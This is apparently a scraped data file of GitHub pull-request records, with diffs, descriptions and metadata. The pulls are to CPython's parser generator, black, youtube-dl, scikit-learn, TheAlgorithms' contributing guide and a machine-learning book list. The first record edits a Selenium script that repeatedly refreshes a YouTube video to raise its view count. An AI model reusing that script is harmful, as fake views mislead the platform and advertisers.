diff --git a/get_youtube_view.py b/get_youtube_view.py index 4291af4e60..84fbf8ce7b 100644 --- a/get_youtube_view.py +++ b/get_youtube_view.py @@ -13,7 +13,7 @@ #adding ability to change number of repeats count = int(input("Number of times to be repeated: ")) #Same as before -x = input("Enter the URL (no https): ") +url = input("Enter the URL : ") print( "Length of video:") minutes = int(input("Minutes ")) seconds = int(input("Seconds ")) @@ -22,9 +22,13 @@ refreshrate = minutes * 60 + seconds #Selecting Safari as the browser driver = webdriver.Safari() -driver.get("http://"+x) -for i in range(count): +if(url.startswith("https://"): + driver.get(url) +else: + driver.get("https://"+url) + +for _ in range(count): #Sets the page to refresh at the refreshrate. time.sleep(refreshrate) driver.refresh()
made less strict when pasting URL
https://api.github.com/repos/geekcomputers/Python/pulls/493
2019-04-12T07:17:58Z
2019-04-13T08:01:43Z
2019-04-13T08:01:43Z
2019-04-21T02:00:16Z
241
geekcomputers/Python
30,959
Update CONTRIBUTING.md
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 8c0f54ad528d..8cd03217d51f 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -23,26 +23,38 @@ We are very happy that you consider implementing algorithms and data structure f We appreciate any contribution, from fixing a grammar mistake in a comment to implementing complex algorithms. Please read this section if you are contributing your work. +Your contribution will be tested by our [automated testing on Travis CI](https://travis-ci.org/TheAlgorithms/Python/pull_requests) to save time and mental energy. After you have submitted your pull request, you should see the Travis tests start to run at the bottom of your submission page. If those tests fail, then click on the ___details___ button try to read through the Travis output to understand the failure. If you do not understand, please leave a comment on your submission page and a community member will try to help. + #### Coding Style We want your work to be readable by others; therefore, we encourage you to note the following: -- Please write in Python 3.x. -- Please consider running [__python/black__](https://github.com/python/black) on your Python file(s) before submitting your pull request. This is not a requirement but it does make your code more readable. There are other code formatters (autopep8, yapf) but the __black__ style is now the recommendation of the Python core team. To use it, +- Please write in Python 3.7+. __print()__ is a function in Python 3 so __print "Hello"__ will _not_ work but __print("Hello")__ will. + +- Please focus hard on naming of functions, classes, and variables. Help your reader by using __descriptive names__ that can help you to remove redundant comments. + - Single letter variable names are _old school_ so please avoid them unless their life only spans a few lines. + - Expand acronyms because __gcd()__ is hard to understand but __greatest_common_divisor()__ is not. + - Please follow the [Python Naming Conventions](https://pep8.org/#prescriptive-naming-conventions) so variable_names and function_names should be lower_case, CONSTANTS in UPPERCASE, ClassNames should be CamelCase, etc. + +- We encourage the use of Python [f-strings](https://realpython.com/python-f-strings/#f-strings-a-new-and-improved-way-to-format-strings-in-python) where the make the code easier to read. + +- Please consider running [__psf/black__](https://github.com/python/black) on your Python file(s) before submitting your pull request. This is not yet a requirement but it does make your code more readable and automatically aligns it with much of [PEP 8](https://www.python.org/dev/peps/pep-0008/). There are other code formatters (autopep8, yapf) but the __black__ style is now the recommendation of the Python Core Team. To use it, ```bash pip3 install black # only required the first time - black my-submission.py + black . ``` - All submissions will need to pass the test __flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics__ before they will be accepted so if possible, try this test locally on your Python file(s) before submitting your pull request. + ```bash + pip3 install flake8 # only required the first time + flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics + ``` -- If you know [PEP 8](https://www.python.org/dev/peps/pep-0008/) already, you will have no problem in coding style, though we do not follow it strictly. Read the remaining section and have fun coding! - -- Always use 4 spaces to indent. +- Original code submission require docstrings or comments to describe your work. -- Original code submission requires comments to describe your work. +- More on docstrings and comments: -- More on comments and docstrings: + If you are using a Wikipedia article or some other source material to create your algorithm, please add the URL in a docstring or comment to help your reader. The following are considered to be bad and may be requested to be improved: @@ -52,34 +64,40 @@ We want your work to be readable by others; therefore, we encourage you to note This is too trivial. Comments are expected to be explanatory. For comments, you can write them above, on or below a line of code, as long as you are consistent within the same piece of code. - *Sometimes, docstrings are avoided.* This will happen if you are using some editors and not careful with indentation: + We encourage you to put docstrings inside your functions but please pay attention to indentation of docstrings. The following is acceptable in this case: ```python + def sumab(a, b): + """ + This function returns the sum of two integers a and b + Return: a + b """ - This function sums a and b - """ - def sum(a, b): return a + b ``` - However, if you insist to use docstrings, we encourage you to put docstrings inside functions. Also, please pay attention to indentation to docstrings. The following is acceptable in this case: +- Write tests (especially [__doctests__](https://docs.python.org/3/library/doctest.html)) to illustrate and verify your work. We highly encourage the use of _doctests on all functions_. ```python def sumab(a, b): """ - This function sums two integers a and b - Return: a + b + This function returns the sum of two integers a and b + Return: a + b + >>> sum(2, 2) + 4 + >>> sum(-2, 3) + 1 + >>> sum(4.9, 6.1) + 10.0 """ return a + b ``` -- `lambda`, `map`, `filter`, `reduce` and complicated list comprehension are welcome and acceptable to demonstrate the power of Python, as long as they are simple enough to read. - - - This is arguable: **write comments** and assign appropriate variable names, so that the code is easy to read! - -- Write tests to illustrate your work. + These doctests will be run by pytest as part of our automated testing so please try to run your doctests locally and make sure that they are found and pass: + ```bash + python3 -m doctest -v my_submission.py + ``` - The following "testing" approaches are **not** encouraged: + The use of the Python builtin __input()__ function is **not** encouraged: ```python input('Enter your input:') @@ -87,34 +105,31 @@ We want your work to be readable by others; therefore, we encourage you to note input = eval(input("Enter your input: ")) ``` - However, if your code uses __input()__ then we encourage you to gracefully deal with leading and trailing whitespace in user input by adding __.strip()__ to the end as in: + However, if your code uses __input()__ then we encourage you to gracefully deal with leading and trailing whitespace in user input by adding __.strip()__ as in: ```python starting_value = int(input("Please enter a starting value: ").strip()) ``` - - Please write down your test case, like the following: - - ```python - def sumab(a, b): - return a + b - # Write tests this way: - print(sumab(1, 2)) # 1+2 = 3 - print(sumab(6, 4)) # 6+4 = 10 - # Or this way: - print("1 + 2 = ", sumab(1, 2)) # 1+2 = 3 - print("6 + 4 = ", sumab(6, 4)) # 6+4 = 10 + + The use of [Python type hints](https://docs.python.org/3/library/typing.html) is encouraged for function parameters and return values. Our automated testing will run [mypy](http://mypy-lang.org) so run that locally before making your submission. +```python +def sumab(a: int, b: int) --> int: + pass ``` - Better yet, if you know how to write [__doctests__](https://docs.python.org/3/library/doctest.html), please consider adding them. +- [__list comprehensions and generators__](https://docs.python.org/3/tutorial/datastructures.html#list-comprehensions) are preferred over the use of `lambda`, `map`, `filter`, `reduce` but the important thing is to demonstrate the power of Python in code that is easy to read and maintain. - Avoid importing external libraries for basic algorithms. Only use those libraries for complicated algorithms. +- If you need a third party module that is not in the file __requirements.txt__, please add it to that file as part of your submission. + #### Other Standard While Submitting Your Work - File extension for code should be `.py`. Jupiter notebook files are acceptable in machine learning algorithms. -- Strictly use snake case (underscore separated) in your file name, as it will be easy to parse in future using scripts. +- Please avoid creating new directories if at all possible. Try to fit your work into the existing directory structue. + +- Strictly use snake_case (underscore_separated) in your file_name, as it will be easy to parse in future using scripts. If possible, follow the standard *within* the folder you are submitting to. @@ -135,5 +150,4 @@ We want your work to be readable by others; therefore, we encourage you to note - Happy coding! - Writer [@poyea](https://github.com/poyea), Jun 2019.
Many __Hacktoberfest__ contributors are not used to __automated testing__ so these updates to CONTRIBUTING.md should help them to understand our standards and recomendations. @cozek Thanks for your review.
https://api.github.com/repos/TheAlgorithms/Python/pulls/1250
2019-10-02T09:01:25Z
2019-10-02T16:19:01Z
2019-10-02T16:19:01Z
2019-10-02T16:22:50Z
2,276
TheAlgorithms/Python
29,905
bpo-40334: use the TOKENS file when checking dangling rules
diff --git a/Tools/peg_generator/pegen/build.py b/Tools/peg_generator/pegen/build.py index 94248ffd9431c4..1eff7a12aa30f4 100644 --- a/Tools/peg_generator/pegen/build.py +++ b/Tools/peg_generator/pegen/build.py @@ -17,6 +17,8 @@ MOD_DIR = pathlib.Path(__file__).parent +TokenDefinitions = Tuple[Dict[int, str], Dict[str, int], Set[str]] + def get_extra_flags(compiler_flags: str, compiler_py_flags_nodist: str) -> List[str]: flags = sysconfig.get_config_var(compiler_flags) @@ -112,7 +114,8 @@ def build_parser( return grammar, parser, tokenizer -def generate_token_definitions(tokens: IO[str]) -> Tuple[Dict[str, int], Set[str]]: +def generate_token_definitions(tokens: IO[str]) -> TokenDefinitions: + all_tokens = {} exact_tokens = {} non_exact_tokens = set() numbers = itertools.count(0) @@ -129,13 +132,15 @@ def generate_token_definitions(tokens: IO[str]) -> Tuple[Dict[str, int], Set[str if len(pieces) == 1: (token,) = pieces non_exact_tokens.add(token) + all_tokens[index] = token elif len(pieces) == 2: - _, op = pieces + token, op = pieces exact_tokens[op.strip("'")] = index + all_tokens[index] = token else: raise ValueError(f"Unexpected line found in Tokens file: {line}") - return exact_tokens, non_exact_tokens + return all_tokens, exact_tokens, non_exact_tokens def build_c_generator( @@ -149,10 +154,10 @@ def build_c_generator( skip_actions: bool = False, ) -> ParserGenerator: with open(tokens_file, "r") as tok_file: - exact_tok, non_exact_tok = generate_token_definitions(tok_file) + all_tokens, exact_tok, non_exact_tok = generate_token_definitions(tok_file) with open(output_file, "w") as file: gen: ParserGenerator = CParserGenerator( - grammar, exact_tok, non_exact_tok, file, skip_actions=skip_actions + grammar, all_tokens, exact_tok, non_exact_tok, file, skip_actions=skip_actions ) gen.generate(grammar_file) diff --git a/Tools/peg_generator/pegen/c_generator.py b/Tools/peg_generator/pegen/c_generator.py index 6c77f43991bbe9..c9c67067d4677f 100644 --- a/Tools/peg_generator/pegen/c_generator.py +++ b/Tools/peg_generator/pegen/c_generator.py @@ -265,13 +265,14 @@ class CParserGenerator(ParserGenerator, GrammarVisitor): def __init__( self, grammar: grammar.Grammar, + tokens: Dict[int, str], exact_tokens: Dict[str, int], non_exact_tokens: Set[str], file: Optional[IO[Text]], debug: bool = False, skip_actions: bool = False, ): - super().__init__(grammar, file) + super().__init__(grammar, tokens, file) self.callmakervisitor: CCallMakerVisitor = CCallMakerVisitor( self, exact_tokens, non_exact_tokens ) diff --git a/Tools/peg_generator/pegen/parser_generator.py b/Tools/peg_generator/pegen/parser_generator.py index b92df2267762d1..03452510b9669b 100644 --- a/Tools/peg_generator/pegen/parser_generator.py +++ b/Tools/peg_generator/pegen/parser_generator.py @@ -1,5 +1,4 @@ import contextlib -import token from abc import abstractmethod from typing import AbstractSet, Dict, IO, Iterator, List, Optional, Set, Text, Tuple @@ -19,11 +18,12 @@ class RuleCheckingVisitor(GrammarVisitor): - def __init__(self, rules: Dict[str, Rule]): + def __init__(self, rules: Dict[str, Rule], tokens: Dict[int, str]): self.rules = rules + self.tokens = tokens def visit_NameLeaf(self, node: NameLeaf) -> None: - if node.value not in self.rules and node.value not in token.tok_name.values(): + if node.value not in self.rules and node.value not in self.tokens.values(): # TODO: Add line/col info to (leaf) nodes raise GrammarError(f"Dangling reference to rule {node.value!r}") @@ -32,12 +32,13 @@ class ParserGenerator: callmakervisitor: GrammarVisitor - def __init__(self, grammar: Grammar, file: Optional[IO[Text]]): + def __init__(self, grammar: Grammar, tokens: Dict[int, str], file: Optional[IO[Text]]): self.grammar = grammar + self.tokens = tokens self.rules = grammar.rules if "trailer" not in grammar.metas and "start" not in self.rules: raise GrammarError("Grammar without a trailer must have a 'start' rule") - checker = RuleCheckingVisitor(self.rules) + checker = RuleCheckingVisitor(self.rules, self.tokens) for rule in self.rules.values(): checker.visit(rule) self.file = file diff --git a/Tools/peg_generator/pegen/python_generator.py b/Tools/peg_generator/pegen/python_generator.py index bde27890c15a65..64336552f24f6c 100644 --- a/Tools/peg_generator/pegen/python_generator.py +++ b/Tools/peg_generator/pegen/python_generator.py @@ -1,3 +1,4 @@ +import token from typing import Any, Dict, Optional, IO, Text, Tuple from pegen.grammar import ( @@ -123,8 +124,13 @@ def visit_Cut(self, node: Cut) -> Tuple[str, str]: class PythonParserGenerator(ParserGenerator, GrammarVisitor): - def __init__(self, grammar: grammar.Grammar, file: Optional[IO[Text]]): - super().__init__(grammar, file) + def __init__( + self, + grammar: grammar.Grammar, + file: Optional[IO[Text]], + tokens: Dict[int, str] = token.tok_name, + ): + super().__init__(grammar, tokens, file) self.callmakervisitor = PythonCallMakerVisitor(self) def generate(self, filename: str) -> None: diff --git a/Tools/peg_generator/pegen/testutil.py b/Tools/peg_generator/pegen/testutil.py index 1f79d8f702fb1b..264659e71768c9 100644 --- a/Tools/peg_generator/pegen/testutil.py +++ b/Tools/peg_generator/pegen/testutil.py @@ -17,6 +17,7 @@ from pegen.python_generator import PythonParserGenerator from pegen.tokenizer import Tokenizer +ALL_TOKENS = token.tok_name EXACT_TOKENS = token.EXACT_TOKEN_TYPES # type: ignore NON_EXACT_TOKENS = { name for index, name in token.tok_name.items() if index not in EXACT_TOKENS.values() @@ -76,7 +77,7 @@ def import_file(full_name: str, path: str) -> Any: def generate_c_parser_source(grammar: Grammar) -> str: out = io.StringIO() - genr = CParserGenerator(grammar, EXACT_TOKENS, NON_EXACT_TOKENS, out) + genr = CParserGenerator(grammar, ALL_TOKENS, EXACT_TOKENS, NON_EXACT_TOKENS, out) genr.generate("<string>") return out.getvalue() @@ -96,7 +97,9 @@ def generate_parser_c_extension( assert not os.listdir(path) source = path / "parse.c" with open(source, "w") as file: - genr = CParserGenerator(grammar, EXACT_TOKENS, NON_EXACT_TOKENS, file, debug=debug) + genr = CParserGenerator( + grammar, ALL_TOKENS, EXACT_TOKENS, NON_EXACT_TOKENS, file, debug=debug + ) genr.generate("parse.c") compile_c_extension(str(source), build_dir=str(path))
<!-- issue-number: [bpo-40334](https://bugs.python.org/issue40334) --> https://bugs.python.org/issue40334 <!-- /issue-number -->
https://api.github.com/repos/python/cpython/pulls/19849
2020-05-01T21:26:44Z
2020-05-01T22:14:12Z
2020-05-01T22:14:12Z
2020-05-01T22:14:16Z
1,880
python/cpython
4,256
Do not add an extra blank line to an import line that has fmt disabled
diff --git a/CHANGES.md b/CHANGES.md index eff2640a01e..06a0ab7e9eb 100644 --- a/CHANGES.md +++ b/CHANGES.md @@ -10,6 +10,9 @@ <!-- Changes that affect Black's stable style --> +- Import lines with `# fmt: skip` and `# fmt: off` no longer have an extra blank line + added when they are right after another import line (#3610) + ### Preview style <!-- Changes that affect Black's preview style --> diff --git a/src/black/comments.py b/src/black/comments.py index 7cf15bf67b3..619123ab4be 100644 --- a/src/black/comments.py +++ b/src/black/comments.py @@ -203,6 +203,7 @@ def convert_one_fmt_off_pair(node: Node) -> bool: STANDALONE_COMMENT, hidden_value, prefix=standalone_comment_prefix, + fmt_pass_converted_first_leaf=first_leaf_of(first), ), ) return True diff --git a/src/black/lines.py b/src/black/lines.py index 329dfc4f0d3..66bba14b357 100644 --- a/src/black/lines.py +++ b/src/black/lines.py @@ -195,6 +195,26 @@ def opens_block(self) -> bool: return False return self.leaves[-1].type == token.COLON + def is_fmt_pass_converted( + self, *, first_leaf_matches: Optional[Callable[[Leaf], bool]] = None + ) -> bool: + """Is this line converted from fmt off/skip code? + + If first_leaf_matches is not None, it only returns True if the first + leaf of converted code matches. + """ + if len(self.leaves) != 1: + return False + leaf = self.leaves[0] + if ( + leaf.type != STANDALONE_COMMENT + or leaf.fmt_pass_converted_first_leaf is None + ): + return False + return first_leaf_matches is None or first_leaf_matches( + leaf.fmt_pass_converted_first_leaf + ) + def contains_standalone_comments(self, depth_limit: int = sys.maxsize) -> bool: """If so, needs to be split before emitting.""" for leaf in self.leaves: @@ -597,6 +617,7 @@ def _maybe_empty_lines(self, current_line: Line) -> Tuple[int, int]: self.previous_line and self.previous_line.is_import and not current_line.is_import + and not current_line.is_fmt_pass_converted(first_leaf_matches=is_import) and depth == self.previous_line.depth ): return (before or 1), 0 diff --git a/src/blib2to3/pytree.py b/src/blib2to3/pytree.py index 15a1420ef7d..ea60c894e20 100644 --- a/src/blib2to3/pytree.py +++ b/src/blib2to3/pytree.py @@ -392,6 +392,10 @@ class Leaf(Base): _prefix = "" # Whitespace and comments preceding this token in the input lineno: int = 0 # Line where this token starts in the input column: int = 0 # Column where this token starts in the input + # If not None, this Leaf is created by converting a block of fmt off/skip + # code, and `fmt_pass_converted_first_leaf` points to the first Leaf in the + # converted code. + fmt_pass_converted_first_leaf: Optional["Leaf"] = None def __init__( self, @@ -401,6 +405,7 @@ def __init__( prefix: Optional[Text] = None, fixers_applied: List[Any] = [], opening_bracket: Optional["Leaf"] = None, + fmt_pass_converted_first_leaf: Optional["Leaf"] = None, ) -> None: """ Initializer. @@ -419,6 +424,7 @@ def __init__( self.fixers_applied: Optional[List[Any]] = fixers_applied[:] self.children = [] self.opening_bracket = opening_bracket + self.fmt_pass_converted_first_leaf = fmt_pass_converted_first_leaf def __repr__(self) -> str: """Return a canonical string representation.""" diff --git a/tests/data/simple_cases/fmtonoff.py b/tests/data/simple_cases/fmtonoff.py index e40ea2c8d21..d1f15cd5c8b 100644 --- a/tests/data/simple_cases/fmtonoff.py +++ b/tests/data/simple_cases/fmtonoff.py @@ -195,7 +195,6 @@ def single_literal_yapf_disable(): from third_party import X, Y, Z from library import some_connection, some_decorator - # fmt: off from third_party import (X, Y, Z) diff --git a/tests/data/simple_cases/fmtpass_imports.py b/tests/data/simple_cases/fmtpass_imports.py new file mode 100644 index 00000000000..8b3c0bc662a --- /dev/null +++ b/tests/data/simple_cases/fmtpass_imports.py @@ -0,0 +1,19 @@ +# Regression test for https://github.com/psf/black/issues/3438 + +import ast +import collections # fmt: skip +import dataclasses +# fmt: off +import os +# fmt: on +import pathlib + +import re # fmt: skip +import secrets + +# fmt: off +import sys +# fmt: on + +import tempfile +import zoneinfo
<!-- Hello! Thanks for submitting a PR. To help make things go a bit more smoothly we would appreciate that you go through this template. --> ### Description Fixes #3438. This isn't put in preview style because: 1. Already formatted code always has the extra blank line, so it shouldn't change already formatted code and doesn't violate the stability policy. 2. This unblocks us from upstreaming the incremental formatting patches in *Pyink*, and we don't want to require `--preview` (in at least in 2023) to use this feature. It would also make integrations with IDEs / pre-commit harder if we require `--preview`. <!-- Good things to put here include: reasoning for the change (please link any relevant issues!), any noteworthy (or hacky) choices to be aware of, or what the problem resolved here looked like ... we won't mind a ranty story :) --> ### Checklist - did you ... <!-- If any of the following items aren't relevant for your contribution please still tick them so we know you've gone through the checklist. All user-facing changes should get an entry. Otherwise, signal to us this should get the magical label to silence the CHANGELOG entry check. Tests are required for bugfixes and new features. Documentation changes are necessary for formatting and most enhancement changes. --> - [x] Add an entry in `CHANGES.md` if necessary? - [x] Add / update tests if necessary? - [x] Add new / update outdated documentation? <!-- Just as a reminder, everyone in all psf/black spaces including PRs must follow the PSF Code of Conduct (link below). Finally, once again thanks for your time and effort. If you have any feedback in regards to your experience contributing here, please let us know! Helpful links: PSF COC: https://www.python.org/psf/conduct/ Contributing docs: https://black.readthedocs.io/en/latest/contributing/index.html Chat on Python Discord: https://discord.gg/RtVdv86PrH -->
https://api.github.com/repos/psf/black/pulls/3610
2023-03-17T02:35:15Z
2023-03-18T04:39:22Z
2023-03-18T04:39:22Z
2023-03-19T04:14:15Z
1,288
psf/black
24,499
Fix hang when backgrounded
diff --git a/youtube_dl/utils.py b/youtube_dl/utils.py index 28941673fa9..a89ff6908b3 100644 --- a/youtube_dl/utils.py +++ b/youtube_dl/utils.py @@ -1820,6 +1820,7 @@ def get_exe_version(exe, args=['--version'], try: out, _ = subprocess.Popen( [encodeArgument(exe)] + args, + stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).communicate() except OSError: return False
- [x] Bug fix --- ### Description of your _pull request_ and other information youtube-dl hangs when backgrounded because ffmpeg -version tries to read from stdin: ``` pb3:youtube-dl jhawk$ python -m youtube_dl -v 'BaW_jenozKc' & [1] 4263 pb3:youtube-dl jhawk$ [debug] System config: [] [debug] User config: [] [debug] Command-line args: [u'-v', u'BaW_jenozKc'] [debug] Encodings: locale UTF-8, fs utf-8, out UTF-8, pref UTF-8 [debug] youtube-dl version 2016.10.21.1 [debug] Git HEAD: 69c2d42 [debug] Python version 2.7.10 - Darwin-14.5.0-x86_64-i386-64bit [1]+ Stopped python -m youtube_dl -v 'BaW_jenozKc' pb3:youtube-dl jhawk$ jobs -l [1]+ 4263 Stopped (tty output): 22python -m youtube_dl -v 'BaW_jenozKc' pb3:youtube-dl jhawk$ pstree 4263 -+= 04263 jhawk python -m youtube_dl -v BaW_jenozKc \--- 04271 jhawk ffmpeg -version pb3:youtube-dl jhawk$ pb3:youtube-dl jhawk$ ffmpeg -version & [2] 4276 pb3:youtube-dl jhawk$ [2]+ Stopped ffmpeg -version pb3:youtube-dl jhawk$ fg %2 ffmpeg -version ffmpeg version 3.1.4 Copyright (c) 2000-2016 the FFmpeg developers built with Apple LLVM version 7.0.2 (clang-700.1.81) configuration: --prefix=/usr/local/Cellar/ffmpeg/3.1.4 --enable-shared --enable-pthreads --enable-gpl --enable-version3 --enable-hardcoded-tables --enable-avresample --cc=clang --host-cflags= --host-ldflags= --enable-opencl --enable-libx264 --enable-libmp3lame --enable-libxvid --enable-openssl --disable-lzma --enable-nonfree --enable-vda libavutil 55. 28.100 / 55. 28.100 libavcodec 57. 48.101 / 57. 48.101 libavformat 57. 41.100 / 57. 41.100 libavdevice 57. 0.101 / 57. 0.101 libavfilter 6. 47.100 / 6. 47.100 libavresample 3. 0. 0 / 3. 0. 0 libswscale 4. 1.100 / 4. 1.100 libswresample 2. 1.100 / 2. 1.100 libpostproc 54. 0.100 / 54. 0.100 pb3:youtube-dl jhawk$ pb3:youtube-dl jhawk$ ffmpeg -version <&- & [2] 4277 pb3:youtube-dl jhawk$ ffmpeg version 3.1.4 Copyright (c) 2000-2016 the FFmpeg developers built with Apple LLVM version 7.0.2 (clang-700.1.81) configuration: --prefix=/usr/local/Cellar/ffmpeg/3.1.4 --enable-shared --enable-pthreads --enable-gpl --enable-version3 --enable-hardcoded-tables --enable-avresample --cc=clang --host-cflags= --host-ldflags= --enable-opencl --enable-libx264 --enable-libmp3lame --enable-libxvid --enable-openssl --disable-lzma --enable-nonfree --enable-vda libavutil 55. 28.100 / 55. 28.100 libavcodec 57. 48.101 / 57. 48.101 libavformat 57. 41.100 / 57. 41.100 libavdevice 57. 0.101 / 57. 0.101 libavfilter 6. 47.100 / 6. 47.100 libavresample 3. 0. 0 / 3. 0. 0 libswscale 4. 1.100 / 4. 1.100 libswresample 2. 1.100 / 2. 1.100 libpostproc 54. 0.100 / 54. 0.100 [2]- Done ffmpeg -version 0>&- pb3:youtube-dl jhawk$ ffmpeg -version </dev/null & [2] 4278 pb3:youtube-dl jhawk$ ffmpeg version 3.1.4 Copyright (c) 2000-2016 the FFmpeg developers built with Apple LLVM version 7.0.2 (clang-700.1.81) configuration: --prefix=/usr/local/Cellar/ffmpeg/3.1.4 --enable-shared --enable-pthreads --enable-gpl --enable-version3 --enable-hardcoded-tables --enable-avresample --cc=clang --host-cflags= --host-ldflags= --enable-opencl --enable-libx264 --enable-libmp3lame --enable-libxvid --enable-openssl --disable-lzma --enable-nonfree --enable-vda libavutil 55. 28.100 / 55. 28.100 libavcodec 57. 48.101 / 57. 48.101 libavformat 57. 41.100 / 57. 41.100 libavdevice 57. 0.101 / 57. 0.101 libavfilter 6. 47.100 / 6. 47.100 libavresample 3. 0. 0 / 3. 0. 0 libswscale 4. 1.100 / 4. 1.100 libswresample 2. 1.100 / 2. 1.100 libpostproc 54. 0.100 / 54. 0.100 [2]- Done ffmpeg -version < /dev/null pb3:youtube-dl jhawk$ ``` While of course the best thing to do would be to fix ffmpeg, in the meantime youtube_dl should workaround it. This patch closes stdin, analagous to calling ffmpeg with <&-. Another choice would be to use </dev/null (see 3cad576), which is arguably a little less fragile (what if ffmpeg calls open() and gets fd0 as the next fd) and a little clearer to read...
https://api.github.com/repos/ytdl-org/youtube-dl/pulls/10996
2016-10-22T00:58:36Z
2016-10-22T05:11:12Z
2016-10-22T05:11:12Z
2018-03-16T15:38:15Z
125
ytdl-org/youtube-dl
50,569
ENH Improve warnings if func returns a dataframe in FunctionTransformer
diff --git a/doc/whats_new/v1.4.rst b/doc/whats_new/v1.4.rst index 8dbd867b0c9ba..c56e67024a890 100644 --- a/doc/whats_new/v1.4.rst +++ b/doc/whats_new/v1.4.rst @@ -250,6 +250,13 @@ Changelog - |Enhancement| Added `neg_root_mean_squared_log_error_scorer` as scorer :pr:`26734` by :user:`Alejandro Martin Gil <101AlexMartin>`. +:mod:`sklearn.preprocessing` +............................ + +- |Enhancement| Improves warnings in :class:`preprocessing.FunctionTransfomer` when + `func` returns a pandas dataframe and the output is configured to be pandas. + :pr:`26944` by `Thomas Fan`_. + :mod:`sklearn.model_selection` .............................. diff --git a/sklearn/preprocessing/_function_transformer.py b/sklearn/preprocessing/_function_transformer.py index f1df0f43dc96e..fa755265d7bc2 100644 --- a/sklearn/preprocessing/_function_transformer.py +++ b/sklearn/preprocessing/_function_transformer.py @@ -4,10 +4,12 @@ from ..base import BaseEstimator, TransformerMixin, _fit_context from ..utils._param_validation import StrOptions +from ..utils._set_output import _get_output_config from ..utils.metaestimators import available_if from ..utils.validation import ( _allclose_dense_sparse, _check_feature_names_in, + _is_pandas_df, check_array, ) @@ -237,7 +239,20 @@ def transform(self, X): Transformed input. """ X = self._check_input(X, reset=False) - return self._transform(X, func=self.func, kw_args=self.kw_args) + out = self._transform(X, func=self.func, kw_args=self.kw_args) + + output_config = _get_output_config("transform", self)["dense"] + if ( + output_config == "pandas" + and self.feature_names_out is None + and not _is_pandas_df(out) + ): + warnings.warn( + "When `set_output` is configured to be 'pandas', `func` should return " + "a DataFrame to follow the `set_output` API or `feature_names_out` " + "should be defined." + ) + return out def inverse_transform(self, X): """Transform X using the inverse function. @@ -338,13 +353,8 @@ def set_output(self, *, transform=None): self : estimator instance Estimator instance. """ - if hasattr(super(), "set_output"): - return super().set_output(transform=transform) - - if transform == "pandas" and self.feature_names_out is None: - warnings.warn( - 'With transform="pandas", `func` should return a DataFrame to follow' - " the set_output API." - ) + if not hasattr(self, "_sklearn_output_config"): + self._sklearn_output_config = {} + self._sklearn_output_config["transform"] = transform return self diff --git a/sklearn/preprocessing/tests/test_function_transformer.py b/sklearn/preprocessing/tests/test_function_transformer.py index d843f56002619..c4b2f79f288f0 100644 --- a/sklearn/preprocessing/tests/test_function_transformer.py +++ b/sklearn/preprocessing/tests/test_function_transformer.py @@ -451,13 +451,26 @@ def test_set_output_func(): assert isinstance(X_trans, pd.DataFrame) assert_array_equal(X_trans.columns, ["a", "b"]) - # If feature_names_out is not defined, then a warning is raised in - # `set_output` ft = FunctionTransformer(lambda x: 2 * x) - msg = "should return a DataFrame to follow the set_output API" - with pytest.warns(UserWarning, match=msg): - ft.set_output(transform="pandas") + ft.set_output(transform="pandas") - X_trans = ft.fit_transform(X) + # no warning is raised when func returns a panda dataframe + with warnings.catch_warnings(): + warnings.simplefilter("error", UserWarning) + X_trans = ft.fit_transform(X) assert isinstance(X_trans, pd.DataFrame) assert_array_equal(X_trans.columns, ["a", "b"]) + + # Warning is raised when func returns a ndarray + ft_np = FunctionTransformer(lambda x: np.asarray(x)) + ft_np.set_output(transform="pandas") + + msg = "When `set_output` is configured to be 'pandas'" + with pytest.warns(UserWarning, match=msg): + ft_np.fit_transform(X) + + # default transform does not warn + ft_np.set_output(transform="default") + with warnings.catch_warnings(): + warnings.simplefilter("error", UserWarning) + ft_np.fit_transform(X)
<!-- Thanks for contributing a pull request! Please ensure you have taken a look at the contribution guidelines: https://github.com/scikit-learn/scikit-learn/blob/main/CONTRIBUTING.md --> #### Reference Issues/PRs <!-- Example: Fixes #1234. See also #3456. Please use keywords (e.g., Fixes) to create link to the issues or pull requests you resolved, so that they will automatically be closed when your pull request is merged. See https://github.com/blog/1506-closing-issues-via-pull-requests --> Closes https://github.com/scikit-learn/scikit-learn/issues/26552 #### What does this implement/fix? Explain your changes. This PR implements the suggestion in https://github.com/scikit-learn/scikit-learn/issues/26552#issuecomment-1594815165. The warning is now delayed to `transform` and not in `set_output`. <!-- Please be aware that we are a loose team of volunteers so patience is necessary; assistance handling other issues is very welcome. We value all user contributions, no matter how minor they are. If we are slow to review, either the pull request needs some benchmarking, tinkering, convincing, etc. or more likely the reviewers are simply busy. In either case, we ask for your understanding during the review process. For more information, see our FAQ on this topic: http://scikit-learn.org/dev/faq.html#why-is-my-pull-request-not-getting-any-attention. Thanks for contributing! -->
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/26944
2023-07-30T22:49:54Z
2023-09-19T17:10:38Z
2023-09-19T17:10:38Z
2023-09-19T17:10:47Z
1,140
scikit-learn/scikit-learn
46,180
Add Practical Gradient Boosting
diff --git a/books.md b/books.md index cab2362d..733e0abe 100644 --- a/books.md +++ b/books.md @@ -101,6 +101,8 @@ The following is a list of free and/or open source books on machine learning, st * [Natural Language Processing in Action, Second Edition](https://www.manning.com/books/natural-language-processing-in-action-second-edition) Early access book * [Getting Started with Natural Language Processing in Action](https://www.manning.com/books/getting-started-with-natural-language-processing) Early access book * [Transfer Learnin for Natural Language Processing](https://www.manning.com/books/transfer-learning-for-natural-language-processing) by Paul Azunre +* [Practical Gradient Boosting](https://www.amazon.com/dp/B0BL1HRD6Z) by Guillaume Saupin + ## Information Retrieval
Hello, I'd like to add my book on gradient boosting in the book section. It's the English edition of my book `Gradient Boosting`, published by the Editions Eni: https://www.editions-eni.fr/livre/gradient-boosting-exploitez-les-arbres-de-decision-pour-le-machine-learning-xgboost-catboost-lightgbm-9782409034022 I think it's a valuable resource for learning gradient boosting (XGBoost, LightGBM, CatBoost, ...)
https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/927
2023-04-11T13:18:46Z
2023-04-12T00:40:03Z
2023-04-12T00:40:03Z
2023-04-12T00:40:03Z
198
josephmisiti/awesome-machine-learning
52,409
Fix a logistic bug
